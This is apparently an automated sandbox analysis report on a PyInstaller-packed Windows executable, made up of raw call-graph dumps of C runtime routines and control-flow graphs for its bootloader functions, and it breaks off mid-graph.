19275 7ff7f3df7ac0 19274->19275 19275->19271 19276 7ff7f3df7af6 19275->19276 19277 7ff7f3df7ae0 19275->19277 19279 7ff7f3df07e8 WideCharToMultiByte 19276->19279 19278 7ff7f3df07e8 WideCharToMultiByte 19277->19278 19280 7ff7f3df7aee 19278->19280 19279->19280 19280->19271 19281 7ff7f3df7b0e 19280->19281 19281->19256 19282 7ff7f3dea948 __free_lconv_num 11 API calls 19281->19282 19282->19256 19289 7ff7f3deed10 19283->19289 19286 7ff7f3def12a 19286->19256 19286->19267 19286->19268 19288 7ff7f3def193 LCMapStringW 19288->19286 19290 7ff7f3deed6d 19289->19290 19296 7ff7f3deed68 __vcrt_InitializeCriticalSectionEx 19289->19296 19290->19286 19298 7ff7f3def1d0 19290->19298 19291 7ff7f3deed9d LoadLibraryExW 19293 7ff7f3deee72 19291->19293 19294 7ff7f3deedc2 GetLastError 19291->19294 19292 7ff7f3deee92 GetProcAddress 19292->19290 19293->19292 19295 7ff7f3deee89 FreeLibrary 19293->19295 19294->19296 19295->19292 19296->19290 19296->19291 19296->19292 19297 7ff7f3deedfc LoadLibraryExW 19296->19297 19297->19293 19297->19296 19299 7ff7f3deed10 __crtLCMapStringW 5 API calls 19298->19299 19300 7ff7f3def1fe __crtLCMapStringW 19299->19300 19300->19288 19303 7ff7f3de9349 19302->19303 19304 7ff7f3de94ad 19302->19304 19303->19138 19305 7ff7f3de94d6 19304->19305 19306 7ff7f3dea948 __free_lconv_num 11 API calls 19304->19306 19307 7ff7f3dea948 __free_lconv_num 11 API calls 19305->19307 19306->19304 19307->19303 19309 7ff7f3df62c1 19308->19309 19311 7ff7f3df62d8 19308->19311 19310 7ff7f3de4f08 _get_daylight 11 API calls 19309->19310 19312 7ff7f3df62c6 19310->19312 19311->19309 19313 7ff7f3df62e6 19311->19313 19314 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 19312->19314 19315 7ff7f3de4f4c 45 API calls 19313->19315 19316 7ff7f3df62d1 19313->19316 19314->19316 19315->19316 19316->18999 19318 7ff7f3de4f4c 45 API calls 19317->19318 19319 7ff7f3df8f71 19318->19319 19322 7ff7f3df8bc8 19319->19322 19324 7ff7f3df8c16 19322->19324 19323 7ff7f3ddc550 _log10_special 8 API calls 19325 7ff7f3df7205 19323->19325 19326 7ff7f3df8c9d 19324->19326 19328 7ff7f3df8c88 GetCPInfo 19324->19328 19331 7ff7f3df8ca1 19324->19331 19325->18999 19325->19002 19327 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 19326->19327 19326->19331 19329 7ff7f3df8d35 19327->19329 19328->19326 19328->19331 19330 7ff7f3ded5fc _fread_nolock 12 API calls 19329->19330 19329->19331 19332 7ff7f3df8d6c 19329->19332 19330->19332 19331->19323 19332->19331 19333 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 19332->19333 19334 7ff7f3df8dda 19333->19334 19335 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 19334->19335 19336 7ff7f3df8ebc 19334->19336 19338 7ff7f3df8e00 19335->19338 19336->19331 19337 7ff7f3dea948 __free_lconv_num 11 API calls 19336->19337 19337->19331 19338->19336 19339 7ff7f3ded5fc _fread_nolock 12 API calls 19338->19339 19340 7ff7f3df8e2d 19338->19340 19339->19340 19340->19336 19341 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 19340->19341 19342 7ff7f3df8ea4 19341->19342 19343 7ff7f3df8ec4 19342->19343 19344 7ff7f3df8eaa 19342->19344 19351 7ff7f3deef68 19343->19351 19344->19336 19347 7ff7f3dea948 __free_lconv_num 11 API calls 19344->19347 19347->19336 19348 7ff7f3df8f03 19348->19331 19350 7ff7f3dea948 __free_lconv_num 11 API calls 19348->19350 19349 7ff7f3dea948 __free_lconv_num 11 API calls 19349->19348 19350->19331 19352 7ff7f3deed10 __crtLCMapStringW 5 API calls 19351->19352 19353 7ff7f3deefa6 19352->19353 19354 7ff7f3deefae 19353->19354 19355 7ff7f3def1d0 __crtLCMapStringW 5 API calls 19353->19355 19354->19348 19354->19349 19356 7ff7f3def017 CompareStringW 19355->19356 19356->19354 19358 7ff7f3df7c41 19357->19358 19359 7ff7f3df7c5a HeapSize 19357->19359 19360 7ff7f3de4f08 _get_daylight 11 API calls 19358->19360 19361 7ff7f3df7c46 19360->19361 19362 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 19361->19362 19363 7ff7f3df7c51 19362->19363 19363->19007 19365 7ff7f3df7c93 19364->19365 19366 7ff7f3df7c89 19364->19366 19368 7ff7f3df7c98 19365->19368 19374 7ff7f3df7c9f _get_daylight 19365->19374 19367 7ff7f3ded5fc _fread_nolock 12 API calls 19366->19367 19373 7ff7f3df7c91 19367->19373 19369 7ff7f3dea948 __free_lconv_num 11 API calls 19368->19369 19369->19373 19370 7ff7f3df7ca5 19372 7ff7f3de4f08 _get_daylight 11 API calls 19370->19372 19371 7ff7f3df7cd2 HeapReAlloc 19371->19373 19371->19374 19372->19373 19373->19011 19374->19370 19374->19371 19375 7ff7f3df3590 _get_daylight 2 API calls 19374->19375 19375->19374 19377 7ff7f3deed10 __crtLCMapStringW 5 API calls 19376->19377 19378 7ff7f3deef44 19377->19378 19378->19016 19380 7ff7f3de54fa 19379->19380 19381 7ff7f3de54d6 19379->19381 19382 7ff7f3de5554 19380->19382 19383 7ff7f3de54ff 19380->19383 19385 7ff7f3dea948 __free_lconv_num 11 API calls 19381->19385 19388 7ff7f3de54e5 19381->19388 19384 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 19382->19384 19386 7ff7f3de5514 19383->19386 19383->19388 19389 7ff7f3dea948 __free_lconv_num 11 API calls 19383->19389 19395 7ff7f3de5570 19384->19395 19385->19388 19390 7ff7f3ded5fc _fread_nolock 12 API calls 19386->19390 19387 7ff7f3de5577 GetLastError 19391 7ff7f3de4e7c _fread_nolock 11 API calls 19387->19391 19388->19019 19388->19020 19389->19386 19390->19388 19394 7ff7f3de5584 19391->19394 19392 7ff7f3de55b2 19392->19388 19393 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 19392->19393 19397 7ff7f3de55f6 19393->19397 19398 7ff7f3de4f08 _get_daylight 11 API calls 19394->19398 19395->19387 19395->19392 19396 7ff7f3de55a5 19395->19396 19399 7ff7f3dea948 __free_lconv_num 11 API calls 19395->19399 19400 7ff7f3ded5fc _fread_nolock 12 API calls 19396->19400 19397->19387 19397->19388 19398->19388 19399->19396 19400->19392 19402 7ff7f3de9225 19401->19402 19413 7ff7f3de9221 19401->19413 19422 7ff7f3df2a3c GetEnvironmentStringsW 19402->19422 19405 7ff7f3de9232 19407 7ff7f3dea948 __free_lconv_num 11 API calls 19405->19407 19406 7ff7f3de923e 19429 7ff7f3de938c 19406->19429 19407->19413 19410 7ff7f3dea948 __free_lconv_num 11 API calls 19411 7ff7f3de9265 19410->19411 19412 7ff7f3dea948 __free_lconv_num 11 API calls 19411->19412 19412->19413 19413->19047 19414 7ff7f3de95cc 19413->19414 19415 7ff7f3de95ef 19414->19415 19420 7ff7f3de9606 19414->19420 19415->19047 19416 7ff7f3deeb98 _get_daylight 11 API calls 19416->19420 19417 7ff7f3de967a 19419 7ff7f3dea948 __free_lconv_num 11 API calls 19417->19419 19418 7ff7f3def8a0 MultiByteToWideChar _fread_nolock 19418->19420 19419->19415 19420->19415 19420->19416 19420->19417 19420->19418 19421 7ff7f3dea948 __free_lconv_num 11 API calls 19420->19421 19421->19420 19423 7ff7f3de922a 19422->19423 19424 7ff7f3df2a60 19422->19424 19423->19405 19423->19406 19425 7ff7f3ded5fc _fread_nolock 12 API calls 19424->19425 19426 7ff7f3df2a97 memcpy_s 19425->19426 19427 7ff7f3dea948 __free_lconv_num 11 API calls 19426->19427 19428 7ff7f3df2ab7 FreeEnvironmentStringsW 19427->19428 19428->19423 19430 7ff7f3de93b4 19429->19430 19431 7ff7f3deeb98 _get_daylight 11 API calls 19430->19431 19443 7ff7f3de93ef 19431->19443 19432 7ff7f3de93f7 19433 7ff7f3dea948 __free_lconv_num 11 API calls 19432->19433 19434 7ff7f3de9246 19433->19434 19434->19410 19435 7ff7f3de9471 19436 7ff7f3dea948 __free_lconv_num 11 API calls 19435->19436 19436->19434 19437 7ff7f3deeb98 _get_daylight 11 API calls 19437->19443 19438 7ff7f3de9460 19440 7ff7f3de94a8 11 API calls 19438->19440 19439 7ff7f3df0474 37 API calls 19439->19443 19441 7ff7f3de9468 19440->19441 19444 7ff7f3dea948 __free_lconv_num 11 API calls 19441->19444 19442 7ff7f3de9494 19445 7ff7f3dea900 _isindst 17 API calls 19442->19445 19443->19432 19443->19435 19443->19437 19443->19438 19443->19439 19443->19442 19446 7ff7f3dea948 __free_lconv_num 11 API calls 19443->19446 19444->19432 19447 7ff7f3de94a6 19445->19447 19446->19443 19450 7ff7f3df8b31 __crtLCMapStringW 19448->19450 19449 7ff7f3df70ee 19449->19074 19449->19075 19450->19449 19451 7ff7f3deef68 6 API calls 19450->19451 19451->19449 20613 7ff7f3dec520 20624 7ff7f3df02d8 EnterCriticalSection 20613->20624 19669 7ff7f3df16b0 19680 7ff7f3df73e4 19669->19680 19681 7ff7f3df73f1 19680->19681 19682 7ff7f3dea948 __free_lconv_num 11 API calls 19681->19682 19683 7ff7f3df740d 19681->19683 19682->19681 19684 7ff7f3dea948 __free_lconv_num 11 API calls 19683->19684 19685 7ff7f3df16b9 19683->19685 19684->19683 19686 7ff7f3df02d8 EnterCriticalSection 19685->19686 18702 7ff7f3de5628 18703 7ff7f3de565f 18702->18703 18704 7ff7f3de5642 18702->18704 18703->18704 18706 7ff7f3de5672 CreateFileW 18703->18706 18705 7ff7f3de4ee8 _fread_nolock 11 API calls 18704->18705 18707 7ff7f3de5647 18705->18707 18708 7ff7f3de56a6 18706->18708 18709 7ff7f3de56dc 18706->18709 18711 7ff7f3de4f08 _get_daylight 11 API calls 18707->18711 18727 7ff7f3de577c GetFileType 18708->18727 18753 7ff7f3de5c04 18709->18753 18714 7ff7f3de564f 18711->18714 18718 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18714->18718 18716 7ff7f3de56e5 18721 7ff7f3de4e7c _fread_nolock 11 API calls 18716->18721 18717 7ff7f3de5710 18774 7ff7f3de59c4 18717->18774 18723 7ff7f3de565a 18718->18723 18719 7ff7f3de56d1 CloseHandle 18719->18723 18720 7ff7f3de56bb CloseHandle 18720->18723 18726 7ff7f3de56ef 18721->18726 18726->18723 18728 7ff7f3de5887 18727->18728 18729 7ff7f3de57ca 18727->18729 18730 7ff7f3de588f 18728->18730 18731 7ff7f3de58b1 18728->18731 18732 7ff7f3de57f6 GetFileInformationByHandle 18729->18732 18737 7ff7f3de5b00 21 API calls 18729->18737 18733 7ff7f3de5893 18730->18733 18734 7ff7f3de58a2 GetLastError 18730->18734 18736 7ff7f3de58d4 PeekNamedPipe 18731->18736 18752 7ff7f3de5872 18731->18752 18732->18734 18735 7ff7f3de581f 18732->18735 18738 7ff7f3de4f08 _get_daylight 11 API calls 18733->18738 18740 7ff7f3de4e7c _fread_nolock 11 API calls 18734->18740 18739 7ff7f3de59c4 51 API calls 18735->18739 18736->18752 18741 7ff7f3de57e4 18737->18741 18738->18752 18742 7ff7f3de582a 18739->18742 18740->18752 18741->18732 18741->18752 18791 7ff7f3de5924 18742->18791 18743 7ff7f3ddc550 _log10_special 8 API calls 18745 7ff7f3de56b4 18743->18745 18745->18719 18745->18720 18747 7ff7f3de5924 10 API calls 18748 7ff7f3de5849 18747->18748 18749 7ff7f3de5924 10 API calls 18748->18749 18750 7ff7f3de585a 18749->18750 18751 7ff7f3de4f08 _get_daylight 11 API calls 18750->18751 18750->18752 18751->18752 18752->18743 18754 7ff7f3de5c3a 18753->18754 18755 7ff7f3de5cd2 __std_exception_copy 18754->18755 18756 7ff7f3de4f08 _get_daylight 11 API calls 18754->18756 18757 7ff7f3ddc550 _log10_special 8 API calls 18755->18757 18758 7ff7f3de5c4c 18756->18758 18759 7ff7f3de56e1 18757->18759 18760 7ff7f3de4f08 _get_daylight 11 API calls 18758->18760 18759->18716 18759->18717 18761 7ff7f3de5c54 18760->18761 18762 7ff7f3de7e08 45 API calls 18761->18762 18763 7ff7f3de5c69 18762->18763 18764 7ff7f3de5c71 18763->18764 18765 7ff7f3de5c7b 18763->18765 18766 7ff7f3de4f08 _get_daylight 11 API calls 18764->18766 18767 7ff7f3de4f08 _get_daylight 11 API calls 18765->18767 18773 7ff7f3de5c76 18766->18773 18768 7ff7f3de5c80 18767->18768 18768->18755 18769 7ff7f3de4f08 _get_daylight 11 API calls 18768->18769 18770 7ff7f3de5c8a 18769->18770 18771 7ff7f3de7e08 45 API calls 18770->18771 18771->18773 18772 7ff7f3de5cc4 GetDriveTypeW 18772->18755 18773->18755 18773->18772 18776 7ff7f3de59ec 18774->18776 18775 7ff7f3de571d 18784 7ff7f3de5b00 18775->18784 18776->18775 18798 7ff7f3def724 18776->18798 18778 7ff7f3de5a80 18778->18775 18779 7ff7f3def724 51 API calls 18778->18779 18780 7ff7f3de5a93 18779->18780 18780->18775 18781 7ff7f3def724 51 API calls 18780->18781 18782 7ff7f3de5aa6 18781->18782 18782->18775 18783 7ff7f3def724 51 API calls 18782->18783 18783->18775 18785 7ff7f3de5b1a 18784->18785 18786 7ff7f3de5b51 18785->18786 18787 7ff7f3de5b2a 18785->18787 18789 7ff7f3def5b8 21 API calls 18786->18789 18788 7ff7f3de5b3a 18787->18788 18790 7ff7f3de4e7c _fread_nolock 11 API calls 18787->18790 18788->18726 18789->18788 18790->18788 18792 7ff7f3de5940 18791->18792 18793 7ff7f3de594d FileTimeToSystemTime 18791->18793 18792->18793 18795 7ff7f3de5948 18792->18795 18794 7ff7f3de5961 SystemTimeToTzSpecificLocalTime 18793->18794 18793->18795 18794->18795 18796 7ff7f3ddc550 _log10_special 8 API calls 18795->18796 18797 7ff7f3de5839 18796->18797 18797->18747 18799 7ff7f3def731 18798->18799 18800 7ff7f3def755 18798->18800 18799->18800 18801 7ff7f3def736 18799->18801 18803 7ff7f3def78f 18800->18803 18804 7ff7f3def7ae 18800->18804 18802 7ff7f3de4f08 _get_daylight 11 API calls 18801->18802 18805 7ff7f3def73b 18802->18805 18806 7ff7f3de4f08 _get_daylight 11 API calls 18803->18806 18807 7ff7f3de4f4c 45 API calls 18804->18807 18808 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18805->18808 18809 7ff7f3def794 18806->18809 18814 7ff7f3def7bb 18807->18814 18810 7ff7f3def746 18808->18810 18811 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18809->18811 18810->18778 18812 7ff7f3def79f 18811->18812 18812->18778 18813 7ff7f3df04dc 51 API calls 18813->18814 18814->18812 18814->18813

                                                                                      Executed Functions

                                                                                      Function 00007FF7F3DD89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 7ff7f3dd89e0-7ff7f3dd8b26 call 7ff7f3ddc850 call 7ff7f3dd9390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7f3de53f0 call 7ff7f3dea47c call 7ff7f3de871c call 7ff7f3de53f0 call 7ff7f3dea47c call 7ff7f3de871c call 7ff7f3de53f0 call 7ff7f3dea47c call 7ff7f3de871c GetCommandLineW CreateProcessW 23 7ff7f3dd8b4d-7ff7f3dd8b89 RegisterClassW 0->23 24 7ff7f3dd8b28-7ff7f3dd8b48 GetLastError call 7ff7f3dd2c50 0->24 25 7ff7f3dd8b91-7ff7f3dd8be5 CreateWindowExW 23->25 26 7ff7f3dd8b8b GetLastError 23->26 31 7ff7f3dd8e39-7ff7f3dd8e5f call 7ff7f3ddc550 24->31 29 7ff7f3dd8bef-7ff7f3dd8bf4 ShowWindow 25->29 30 7ff7f3dd8be7-7ff7f3dd8bed GetLastError 25->30 26->25 32 7ff7f3dd8bfa-7ff7f3dd8c0a WaitForSingleObject 29->32 30->32 34 7ff7f3dd8c0c 32->34 35 7ff7f3dd8c88-7ff7f3dd8c8f 32->35 37 7ff7f3dd8c10-7ff7f3dd8c13 34->37 38 7ff7f3dd8cd2-7ff7f3dd8cd9 35->38 39 7ff7f3dd8c91-7ff7f3dd8ca1 WaitForSingleObject 35->39 44 7ff7f3dd8c15 GetLastError 37->44 45 7ff7f3dd8c1b-7ff7f3dd8c22 37->45 42 7ff7f3dd8dc0-7ff7f3dd8dd9 GetMessageW 38->42 43 7ff7f3dd8cdf-7ff7f3dd8cf5 QueryPerformanceFrequency QueryPerformanceCounter 38->43 40 7ff7f3dd8df8-7ff7f3dd8e02 39->40 41 7ff7f3dd8ca7-7ff7f3dd8cb7 TerminateProcess 39->41 46 7ff7f3dd8e04-7ff7f3dd8e0a DestroyWindow 40->46 47 7ff7f3dd8e11-7ff7f3dd8e35 GetExitCodeProcess CloseHandle * 2 40->47 48 7ff7f3dd8cbf-7ff7f3dd8ccd WaitForSingleObject 41->48 49 7ff7f3dd8cb9 GetLastError 41->49 52 7ff7f3dd8def-7ff7f3dd8df6 42->52 53 7ff7f3dd8ddb-7ff7f3dd8de9 TranslateMessage DispatchMessageW 42->53 50 7ff7f3dd8d00-7ff7f3dd8d38 MsgWaitForMultipleObjects PeekMessageW 43->50 44->45 45->39 51 7ff7f3dd8c24-7ff7f3dd8c41 PeekMessageW 45->51 46->47 47->31 48->40 49->48 54 7ff7f3dd8d73-7ff7f3dd8d7a 50->54 55 7ff7f3dd8d3a 50->55 56 7ff7f3dd8c43-7ff7f3dd8c74 TranslateMessage DispatchMessageW PeekMessageW 51->56 57 7ff7f3dd8c76-7ff7f3dd8c86 WaitForSingleObject 51->57 52->40 52->42 53->52 54->42 59 7ff7f3dd8d7c-7ff7f3dd8da5 QueryPerformanceCounter 54->59 58 7ff7f3dd8d40-7ff7f3dd8d71 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->35 57->37 58->54 58->58 59->50 60 7ff7f3dd8dab-7ff7f3dd8db2 59->60 60->40 61 7ff7f3dd8db4-7ff7f3dd8db8 60->61 61->42
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                      • API String ID: 3832162212-3165540532
                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                      • Instruction ID: a8d80dfe3c9e3fe2b945a64a1ebc6c5d45b083e293a6540627b65f3584598d47
                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                      • Instruction Fuzzy Hash: 0CD18732A09A8286E790AFB4E8942A9B764FF44758F800235DE7D6B7D8DF3CD145C790
                                                                                      Function 00007FF7F3DD1000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 62 7ff7f3dd1000-7ff7f3dd3806 call 7ff7f3ddfe18 call 7ff7f3ddfe20 call 7ff7f3ddc850 call 7ff7f3de53f0 call 7ff7f3de5484 call 7ff7f3dd36b0 76 7ff7f3dd3814-7ff7f3dd3836 call 7ff7f3dd1950 62->76 77 7ff7f3dd3808-7ff7f3dd380f 62->77 82 7ff7f3dd391b-7ff7f3dd3931 call 7ff7f3dd45c0 76->82 83 7ff7f3dd383c-7ff7f3dd3856 call 7ff7f3dd1c80 76->83 78 7ff7f3dd3c97-7ff7f3dd3cb2 call 7ff7f3ddc550 77->78 90 7ff7f3dd3933-7ff7f3dd3960 call 7ff7f3dd7f90 82->90 91 7ff7f3dd396a-7ff7f3dd397f call 7ff7f3dd2710 82->91 87 7ff7f3dd385b-7ff7f3dd389b call 7ff7f3dd8830 83->87 97 7ff7f3dd38c1-7ff7f3dd38cc call 7ff7f3de4f30 87->97 98 7ff7f3dd389d-7ff7f3dd38a3 87->98 99 7ff7f3dd3984-7ff7f3dd39a6 call 7ff7f3dd1c80 90->99 100 7ff7f3dd3962-7ff7f3dd3965 call 7ff7f3de004c 90->100 101 7ff7f3dd3c8f 91->101 109 7ff7f3dd38d2-7ff7f3dd38e1 call 7ff7f3dd8830 97->109 110 7ff7f3dd39fc-7ff7f3dd3a2a call 7ff7f3dd8940 call 7ff7f3dd89a0 * 3 97->110 102 7ff7f3dd38a5-7ff7f3dd38ad 98->102 103 7ff7f3dd38af-7ff7f3dd38bd call 7ff7f3dd89a0 98->103 115 7ff7f3dd39b0-7ff7f3dd39b9 99->115 100->91 101->78 102->103 103->97 119 7ff7f3dd39f4-7ff7f3dd39f7 call 7ff7f3de4f30 109->119 120 7ff7f3dd38e7-7ff7f3dd38ed 109->120 138 7ff7f3dd3a2f-7ff7f3dd3a3e call 7ff7f3dd8830 110->138 115->115 118 7ff7f3dd39bb-7ff7f3dd39d8 call 7ff7f3dd1950 115->118 118->87 130 7ff7f3dd39de-7ff7f3dd39ef call 7ff7f3dd2710 118->130 119->110 124 7ff7f3dd38f0-7ff7f3dd38fc 120->124 127 7ff7f3dd3905-7ff7f3dd3908 124->127 128 7ff7f3dd38fe-7ff7f3dd3903 124->128 127->119 131 7ff7f3dd390e-7ff7f3dd3916 call 7ff7f3de4f30 127->131 128->124 128->127 130->101 131->138 141 7ff7f3dd3a44-7ff7f3dd3a47 138->141 142 7ff7f3dd3b45-7ff7f3dd3b53 138->142 141->142 145 7ff7f3dd3a4d-7ff7f3dd3a50 141->145 143 7ff7f3dd3a67 142->143 144 7ff7f3dd3b59-7ff7f3dd3b5d 142->144 146 7ff7f3dd3a6b-7ff7f3dd3a90 call 7ff7f3de4f30 143->146 144->146 147 7ff7f3dd3b14-7ff7f3dd3b17 145->147 148 7ff7f3dd3a56-7ff7f3dd3a5a 145->148 157 7ff7f3dd3a92-7ff7f3dd3aa6 call 7ff7f3dd8940 146->157 158 7ff7f3dd3aab-7ff7f3dd3ac0 146->158 150 7ff7f3dd3b2f-7ff7f3dd3b40 call 7ff7f3dd2710 147->150 151 7ff7f3dd3b19-7ff7f3dd3b1d 147->151 148->147 149 7ff7f3dd3a60 148->149 149->143 159 7ff7f3dd3c7f-7ff7f3dd3c87 150->159 151->150 153 7ff7f3dd3b1f-7ff7f3dd3b2a 151->153 153->146 157->158 161 7ff7f3dd3ac6-7ff7f3dd3aca 158->161 162 7ff7f3dd3be8-7ff7f3dd3bfa call 7ff7f3dd8830 158->162 159->101 164 7ff7f3dd3ad0-7ff7f3dd3ae8 call 7ff7f3de5250 161->164 165 7ff7f3dd3bcd-7ff7f3dd3be2 call 7ff7f3dd1940 161->165 170 7ff7f3dd3bfc-7ff7f3dd3c02 162->170 171 7ff7f3dd3c2e 162->171 175 7ff7f3dd3b62-7ff7f3dd3b7a call 7ff7f3de5250 164->175 176 7ff7f3dd3aea-7ff7f3dd3b02 call 7ff7f3de5250 164->176 165->161 165->162 173 7ff7f3dd3c04-7ff7f3dd3c1c 170->173 174 7ff7f3dd3c1e-7ff7f3dd3c2c 170->174 177 7ff7f3dd3c31-7ff7f3dd3c40 call 7ff7f3de4f30 171->177 173->177 174->177 186 7ff7f3dd3b7c-7ff7f3dd3b80 175->186 187 7ff7f3dd3b87-7ff7f3dd3b9f call 7ff7f3de5250 175->187 176->165 188 7ff7f3dd3b08-7ff7f3dd3b0f 176->188 184 7ff7f3dd3c46-7ff7f3dd3c4a 177->184 185 7ff7f3dd3d41-7ff7f3dd3d63 call 7ff7f3dd44e0 177->185 189 7ff7f3dd3cd4-7ff7f3dd3ce6 call 7ff7f3dd8830 184->189 190 7ff7f3dd3c50-7ff7f3dd3c5f call 7ff7f3dd90e0 184->190 199 7ff7f3dd3d65-7ff7f3dd3d6f call 7ff7f3dd4630 185->199 200 7ff7f3dd3d71-7ff7f3dd3d82 call 7ff7f3dd1c80 185->200 186->187 201 7ff7f3dd3ba1-7ff7f3dd3ba5 187->201 202 7ff7f3dd3bac-7ff7f3dd3bc4 call 7ff7f3de5250 187->202 188->165 206 7ff7f3dd3d35-7ff7f3dd3d3c 189->206 207 7ff7f3dd3ce8-7ff7f3dd3ceb 189->207 204 7ff7f3dd3cb3-7ff7f3dd3cb6 call 7ff7f3dd8660 190->204 205 7ff7f3dd3c61 190->205 214 7ff7f3dd3d87-7ff7f3dd3d96 199->214 200->214 201->202 202->165 217 7ff7f3dd3bc6 202->217 216 7ff7f3dd3cbb-7ff7f3dd3cbd 204->216 211 7ff7f3dd3c68 call 7ff7f3dd2710 205->211 206->211 207->206 212 7ff7f3dd3ced-7ff7f3dd3d10 call 7ff7f3dd1c80 207->212 225 7ff7f3dd3c6d-7ff7f3dd3c77 211->225 229 7ff7f3dd3d12-7ff7f3dd3d26 call 7ff7f3dd2710 call 7ff7f3de4f30 212->229 230 7ff7f3dd3d2b-7ff7f3dd3d33 call 7ff7f3de4f30 212->230 220 7ff7f3dd3dbc-7ff7f3dd3dd2 call 7ff7f3dd9390 214->220 221 7ff7f3dd3d98-7ff7f3dd3d9f 214->221 223 7ff7f3dd3cbf-7ff7f3dd3cc6 216->223 224 7ff7f3dd3cc8-7ff7f3dd3ccf 216->224 217->165 233 7ff7f3dd3dd4 220->233 234 7ff7f3dd3de0-7ff7f3dd3dfc SetDllDirectoryW 220->234 221->220 227 7ff7f3dd3da1-7ff7f3dd3da5 221->227 223->211 224->214 225->159 227->220 231 7ff7f3dd3da7-7ff7f3dd3db6 LoadLibraryExW 227->231 229->225 230->214 231->220 233->234 237 7ff7f3dd3e02-7ff7f3dd3e11 call 7ff7f3dd8830 234->237 238 7ff7f3dd3ef9-7ff7f3dd3f00 234->238 251 7ff7f3dd3e13-7ff7f3dd3e19 237->251 252 7ff7f3dd3e2a-7ff7f3dd3e34 call 7ff7f3de4f30 237->252 240 7ff7f3dd3f06-7ff7f3dd3f0d 238->240 241 7ff7f3dd4000-7ff7f3dd4008 238->241 240->241 244 7ff7f3dd3f13-7ff7f3dd3f1d call 7ff7f3dd33c0 240->244 245 7ff7f3dd402d-7ff7f3dd405f call 7ff7f3dd36a0 call 7ff7f3dd3360 call 7ff7f3dd3670 call 7ff7f3dd6fc0 call 7ff7f3dd6d70 241->245 246 7ff7f3dd400a-7ff7f3dd4027 PostMessageW GetMessageW 241->246 244->225 258 7ff7f3dd3f23-7ff7f3dd3f37 call 7ff7f3dd90c0 244->258 246->245 255 7ff7f3dd3e25-7ff7f3dd3e27 251->255 256 7ff7f3dd3e1b-7ff7f3dd3e23 251->256 263 7ff7f3dd3eea-7ff7f3dd3ef4 call 7ff7f3dd8940 252->263 264 7ff7f3dd3e3a-7ff7f3dd3e40 252->264 255->252 256->255 271 7ff7f3dd3f5c-7ff7f3dd3f72 call 7ff7f3dd8940 call 7ff7f3dd89e0 258->271 272 7ff7f3dd3f39-7ff7f3dd3f56 PostMessageW GetMessageW 258->272 263->238 264->263 268 7ff7f3dd3e46-7ff7f3dd3e4c 264->268 269 7ff7f3dd3e4e-7ff7f3dd3e50 268->269 270 7ff7f3dd3e57-7ff7f3dd3e59 268->270 274 7ff7f3dd3e5f-7ff7f3dd3e7b call 7ff7f3dd6dc0 call 7ff7f3dd7340 269->274 275 7ff7f3dd3e52 269->275 270->238 270->274 285 7ff7f3dd3f77-7ff7f3dd3f9f call 7ff7f3dd6fc0 call 7ff7f3dd6d70 call 7ff7f3dd88e0 271->285 272->271 289 7ff7f3dd3e86-7ff7f3dd3e8d 274->289 290 7ff7f3dd3e7d-7ff7f3dd3e84 274->290 275->238 310 7ff7f3dd3fa1-7ff7f3dd3fb7 call 7ff7f3dd8ed0 call 7ff7f3dd88e0 285->310 311 7ff7f3dd3fed-7ff7f3dd3ffb call 7ff7f3dd1900 285->311 293 7ff7f3dd3e8f-7ff7f3dd3e9c call 7ff7f3dd6e00 289->293 294 7ff7f3dd3ea7-7ff7f3dd3eb1 call 7ff7f3dd71b0 289->294 292 7ff7f3dd3ed3-7ff7f3dd3ee8 call 7ff7f3dd2a50 call 7ff7f3dd6fc0 call 7ff7f3dd6d70 290->292 292->238 293->294 308 7ff7f3dd3e9e-7ff7f3dd3ea5 293->308 304 7ff7f3dd3eb3-7ff7f3dd3eba 294->304 305 7ff7f3dd3ebc-7ff7f3dd3eca call 7ff7f3dd74f0 294->305 304->292 305->238 318 7ff7f3dd3ecc 305->318 308->292 310->311 323 